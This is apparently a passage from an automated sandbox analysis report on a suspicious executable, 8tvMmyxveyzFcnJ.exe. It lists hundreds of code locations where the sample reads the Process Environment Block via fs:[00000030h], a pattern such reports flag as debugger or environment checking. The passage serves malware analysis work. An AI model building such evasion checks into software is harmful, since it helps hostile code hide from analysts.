          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AC0F0 mov eax, dword ptr fs:[00000030h]3_2_013AC0F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F20F0 mov ecx, dword ptr fs:[00000030h]3_2_013F20F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B80E9 mov eax, dword ptr fs:[00000030h]3_2_013B80E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D50E4 mov eax, dword ptr fs:[00000030h]3_2_013D50E4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D50E4 mov ecx, dword ptr fs:[00000030h]3_2_013D50E4
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AA0E3 mov ecx, dword ptr fs:[00000030h]3_2_013AA0E3
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D90DB mov eax, dword ptr fs:[00000030h]3_2_013D90DB
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014480A8 mov eax, dword ptr fs:[00000030h]3_2_014480A8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov ecx, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov ecx, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov ecx, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov ecx, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C70C0 mov eax, dword ptr fs:[00000030h]3_2_013C70C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014760B8 mov eax, dword ptr fs:[00000030h]3_2_014760B8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014760B8 mov ecx, dword ptr fs:[00000030h]3_2_014760B8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01485341 mov eax, dword ptr fs:[00000030h]3_2_01485341
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A7330 mov eax, dword ptr fs:[00000030h]3_2_013A7330
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01432349 mov eax, dword ptr fs:[00000030h]3_2_01432349
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147A352 mov eax, dword ptr fs:[00000030h]3_2_0147A352
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013DF32A mov eax, dword ptr fs:[00000030h]3_2_013DF32A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143035C mov eax, dword ptr fs:[00000030h]3_2_0143035C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143035C mov eax, dword ptr fs:[00000030h]3_2_0143035C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143035C mov eax, dword ptr fs:[00000030h]3_2_0143035C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143035C mov ecx, dword ptr fs:[00000030h]3_2_0143035C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143035C mov eax, dword ptr fs:[00000030h]3_2_0143035C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143035C mov eax, dword ptr fs:[00000030h]3_2_0143035C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146F367 mov eax, dword ptr fs:[00000030h]3_2_0146F367
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AC310 mov ecx, dword ptr fs:[00000030h]3_2_013AC310
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D0310 mov ecx, dword ptr fs:[00000030h]3_2_013D0310
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EA30B mov eax, dword ptr fs:[00000030h]3_2_013EA30B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EA30B mov eax, dword ptr fs:[00000030h]3_2_013EA30B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EA30B mov eax, dword ptr fs:[00000030h]3_2_013EA30B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0145437C mov eax, dword ptr fs:[00000030h]3_2_0145437C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143930B mov eax, dword ptr fs:[00000030h]3_2_0143930B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143930B mov eax, dword ptr fs:[00000030h]3_2_0143930B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0143930B mov eax, dword ptr fs:[00000030h]3_2_0143930B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B7370 mov eax, dword ptr fs:[00000030h]3_2_013B7370
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B7370 mov eax, dword ptr fs:[00000030h]3_2_013B7370
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B7370 mov eax, dword ptr fs:[00000030h]3_2_013B7370
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9353 mov eax, dword ptr fs:[00000030h]3_2_013A9353
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9353 mov eax, dword ptr fs:[00000030h]3_2_013A9353
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147132D mov eax, dword ptr fs:[00000030h]3_2_0147132D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147132D mov eax, dword ptr fs:[00000030h]3_2_0147132D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AD34C mov eax, dword ptr fs:[00000030h]3_2_013AD34C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AD34C mov eax, dword ptr fs:[00000030h]3_2_013AD34C
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014363C0 mov eax, dword ptr fs:[00000030h]3_2_014363C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146C3CD mov eax, dword ptr fs:[00000030h]3_2_0146C3CD
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146B3D0 mov ecx, dword ptr fs:[00000030h]3_2_0146B3D0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D33A5 mov eax, dword ptr fs:[00000030h]3_2_013D33A5
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E33A0 mov eax, dword ptr fs:[00000030h]3_2_013E33A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E33A0 mov eax, dword ptr fs:[00000030h]3_2_013E33A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146F3E6 mov eax, dword ptr fs:[00000030h]3_2_0146F3E6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A8397 mov eax, dword ptr fs:[00000030h]3_2_013A8397
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A8397 mov eax, dword ptr fs:[00000030h]3_2_013A8397
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A8397 mov eax, dword ptr fs:[00000030h]3_2_013A8397
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AE388 mov eax, dword ptr fs:[00000030h]3_2_013AE388
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AE388 mov eax, dword ptr fs:[00000030h]3_2_013AE388
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AE388 mov eax, dword ptr fs:[00000030h]3_2_013AE388
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D438F mov eax, dword ptr fs:[00000030h]3_2_013D438F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D438F mov eax, dword ptr fs:[00000030h]3_2_013D438F
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014853FC mov eax, dword ptr fs:[00000030h]3_2_014853FC
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E63FF mov eax, dword ptr fs:[00000030h]3_2_013E63FF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CE3F0 mov eax, dword ptr fs:[00000030h]3_2_013CE3F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CE3F0 mov eax, dword ptr fs:[00000030h]3_2_013CE3F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013CE3F0 mov eax, dword ptr fs:[00000030h]3_2_013CE3F0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0148539D mov eax, dword ptr fs:[00000030h]3_2_0148539D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C03E9 mov eax, dword ptr fs:[00000030h]3_2_013C03E9
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0140739A mov eax, dword ptr fs:[00000030h]3_2_0140739A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0140739A mov eax, dword ptr fs:[00000030h]3_2_0140739A
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA3C0 mov eax, dword ptr fs:[00000030h]3_2_013BA3C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA3C0 mov eax, dword ptr fs:[00000030h]3_2_013BA3C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA3C0 mov eax, dword ptr fs:[00000030h]3_2_013BA3C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA3C0 mov eax, dword ptr fs:[00000030h]3_2_013BA3C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA3C0 mov eax, dword ptr fs:[00000030h]3_2_013BA3C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013BA3C0 mov eax, dword ptr fs:[00000030h]3_2_013BA3C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B83C0 mov eax, dword ptr fs:[00000030h]3_2_013B83C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B83C0 mov eax, dword ptr fs:[00000030h]3_2_013B83C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B83C0 mov eax, dword ptr fs:[00000030h]3_2_013B83C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B83C0 mov eax, dword ptr fs:[00000030h]3_2_013B83C0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01438243 mov eax, dword ptr fs:[00000030h]3_2_01438243
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01438243 mov ecx, dword ptr fs:[00000030h]3_2_01438243
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A823B mov eax, dword ptr fs:[00000030h]3_2_013A823B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146B256 mov eax, dword ptr fs:[00000030h]3_2_0146B256
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146B256 mov eax, dword ptr fs:[00000030h]3_2_0146B256
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147D26B mov eax, dword ptr fs:[00000030h]3_2_0147D26B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0147D26B mov eax, dword ptr fs:[00000030h]3_2_0147D26B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01460274 mov eax, dword ptr fs:[00000030h]3_2_01460274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E7208 mov eax, dword ptr fs:[00000030h]3_2_013E7208
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E7208 mov eax, dword ptr fs:[00000030h]3_2_013E7208
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013D9274 mov eax, dword ptr fs:[00000030h]3_2_013D9274
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F1270 mov eax, dword ptr fs:[00000030h]3_2_013F1270
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013F1270 mov eax, dword ptr fs:[00000030h]3_2_013F1270
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A826B mov eax, dword ptr fs:[00000030h]3_2_013A826B
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B4260 mov eax, dword ptr fs:[00000030h]3_2_013B4260
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B4260 mov eax, dword ptr fs:[00000030h]3_2_013B4260
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B4260 mov eax, dword ptr fs:[00000030h]3_2_013B4260
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013B6259 mov eax, dword ptr fs:[00000030h]3_2_013B6259
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013AA250 mov eax, dword ptr fs:[00000030h]3_2_013AA250
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01485227 mov eax, dword ptr fs:[00000030h]3_2_01485227
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E724D mov eax, dword ptr fs:[00000030h]3_2_013E724D
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9240 mov eax, dword ptr fs:[00000030h]3_2_013A9240
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A9240 mov eax, dword ptr fs:[00000030h]3_2_013A9240
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C02A0 mov eax, dword ptr fs:[00000030h]3_2_013C02A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C02A0 mov eax, dword ptr fs:[00000030h]3_2_013C02A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C52A0 mov eax, dword ptr fs:[00000030h]3_2_013C52A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C52A0 mov eax, dword ptr fs:[00000030h]3_2_013C52A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C52A0 mov eax, dword ptr fs:[00000030h]3_2_013C52A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C52A0 mov eax, dword ptr fs:[00000030h]3_2_013C52A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E329E mov eax, dword ptr fs:[00000030h]3_2_013E329E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013E329E mov eax, dword ptr fs:[00000030h]3_2_013E329E
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014852E2 mov eax, dword ptr fs:[00000030h]3_2_014852E2
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014612ED mov eax, dword ptr fs:[00000030h]3_2_014612ED
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EE284 mov eax, dword ptr fs:[00000030h]3_2_013EE284
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013EE284 mov eax, dword ptr fs:[00000030h]3_2_013EE284
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_0146F2F8 mov eax, dword ptr fs:[00000030h]3_2_0146F2F8
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01430283 mov eax, dword ptr fs:[00000030h]3_2_01430283
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01430283 mov eax, dword ptr fs:[00000030h]3_2_01430283
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01430283 mov eax, dword ptr fs:[00000030h]3_2_01430283
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013A92FF mov eax, dword ptr fs:[00000030h]3_2_013A92FF
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_01485283 mov eax, dword ptr fs:[00000030h]3_2_01485283
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C02E1 mov eax, dword ptr fs:[00000030h]3_2_013C02E1
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C02E1 mov eax, dword ptr fs:[00000030h]3_2_013C02E1
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_013C02E1 mov eax, dword ptr fs:[00000030h]3_2_013C02E1
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014792A6 mov eax, dword ptr fs:[00000030h]3_2_014792A6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014792A6 mov eax, dword ptr fs:[00000030h]3_2_014792A6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014792A6 mov eax, dword ptr fs:[00000030h]3_2_014792A6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014792A6 mov eax, dword ptr fs:[00000030h]3_2_014792A6
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014462A0 mov eax, dword ptr fs:[00000030h]3_2_014462A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014462A0 mov ecx, dword ptr fs:[00000030h]3_2_014462A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014462A0 mov eax, dword ptr fs:[00000030h]3_2_014462A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014462A0 mov eax, dword ptr fs:[00000030h]3_2_014462A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014462A0 mov eax, dword ptr fs:[00000030h]3_2_014462A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014462A0 mov eax, dword ptr fs:[00000030h]3_2_014462A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014472A0 mov eax, dword ptr fs:[00000030h]3_2_014472A0
          Source: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exeCode function: 3_2_014472A0 mov eax, dword ptr fs:[00000030h]3_2_014472A0
